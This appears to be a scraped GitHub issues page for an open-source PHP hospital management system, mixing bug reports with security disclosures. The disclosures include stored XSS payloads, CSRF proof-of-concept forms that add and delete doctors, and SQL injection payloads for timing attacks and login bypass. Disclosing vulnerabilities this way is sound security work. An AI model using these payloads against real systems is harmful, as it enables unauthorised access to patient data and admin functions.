Git Product home page Git Product logo

hospital-management-system's Issues

Admin login problem

I have tried to login using the provided admin login credentials but I am get an error stating wrong username or password. Kindly assist

Persistent cross-site scripting (XSS) targeted towards web admin through /admin-panel1.php at via the parameter demail.

Persistent cross-site scripting (XSS) in Hospital Management System v4.0 targeted towards web admin through /admin-panel1.php at via the parameter demail.

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: <sCrIpT>alert(5555)</ScRiPt>
mail-xss

xss-2

Proof of concept (Poc)

<sCrIpT>alert(5555)</ScRiPt>

CSRF in adding and deleting doctor

Hi,

There is a site-wide CSRF vulnerability in every functionality.

Add Doctor

<html>
  <body>
    <form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
      <input type="hidden" name="doctor" value="test" />
      <input type="hidden" name="special" value="Cardiologist" />
      <input type="hidden" name="demail" value="test&#64;gmail&#46;com" />
      <input type="hidden" name="dpassword" value="testtest" />
      <input type="hidden" name="cdpassword" value="testtest" />
      <input type="hidden" name="docFees" value="123" />
      <input type="hidden" name="docsub" value="Add&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Delete Doctor

<html>
  <body>
    <form action="http://localhost/admin-panel1.php" method="POST">
      <input type="hidden" name="demail" value="testbydhakalananda&#64;gmail&#46;com" />
      <input type="hidden" name="docsub1" value="Delete&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Persistent cross-site scripting (XSS) in targeted towards web admin through /admin-panel1.php at via the parameter "special".

Add Doctor info payload to Doctor Special of Add Doctor page to target /admin-panel1.php, then use burpsuite get requests datas, change the 'special' parameter to xss payload: <script>alert(123)</script>
Step to exploit:

  1. Navigate to http://hospital.com/admin-panel1.php
  2. Click 'Add Doctors ', use burpsuite to insert xss payload in the "special" parameter
  3. Click "Add Doctors"

Screenshot 2022-03-29 at 16 34 01

Screenshot 2022-03-29 at 16 34 32

Proof of concept (Poc):

<script>alert(123)</script>

Bug Found

  1. The appointments which are past the due time are still active. They can either be rescheduled by the docter or the appointment can be simply cancelled by the doctor.
    Inkedbug1 (appointment time is due)

Trying to get in touch regarding a security issue

Hi there,

I couldn't find a SECURITY.md in your repository and am not sure how to best contact you privately to disclose a security issue.

Can you add a SECURITY.md file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.

Once you've done that, you should receive an e-mail within the next hour with more info.

Thanks! (cc @huntr-helper)

Bug Found : 2

Appointment status in doctor panel should change from "active" to "completed" either after the prescription is given or after the bill is paid by the patient.

The completed appointment should be removed from the doctor panel after the bill is paid.

Persistent cross-site scripting (XSS) in targeted towards web admin through /admin-panel1.php at via the parameter dpassword.

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: <sCrIpT>alert(7777)</ScRiPt>
Steps to exploit:

  1. Navigate to http://hospital.com/admin-panel1.php

  2. click 'Add Doctors ', use burpsuite to insert xss payload in the "dpassword" parameter

  3. Click "Add Doctors"

passwd-xss
passwd-2-xss

Proof of concept (Poc):

<sCrIpT>alert(7777)</ScRiPt>

Persistent cross-site scripting (XSS) in targeted towards web admin through /admin-panel1.php at via the parameter doctor.

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>

xss-1

xss-2
Proof of concept (Poc):

<sCrIpT>alert(1234)</ScRiPt>

Multiple Vulnerabilities

Multiple SQL injections and a XSS vulnerability in Hospital-Management-System v4

A Resuming Table of the Discovered Vulnerabilities:

image

To reproduce the XSS vulnerability a <script>alert(1)</script> would work. And for the SQL injections, time delay payloads work (such as '+(select*from(select(sleep(20)))a)+')

Add new feature

Hello @kishan0725
Can I contribute to this project by adding new feature to the current project like:
Adding a medicine buying module
Adding payment module
Creating a web interface for the same

would it be fine if I work on it?

Bypass authentication with SQL Injection

VULNERABLE: SQL Injection Authentication Bypass exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/func.php" via the ‘email’ parameters.

  • Description: The vulnerability is present in the “/Hospital-Management-System-master/func.php " , and can be exploited throuth a POST request via the ‘email’ parameters.
  • Impact: Allow attacker inject query and access , disclosure of all data on the system.
  • Suggestions: User input should be filter, Escaping and Parameterized Queries.
  • Payload: email =' or 1 limit 0,1#
  • File affect:
  • code
  • Proof of concept (POC):
  • Inject payload:
  • Login
  • Bypass authentication success and redirect admin panel
  • done

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.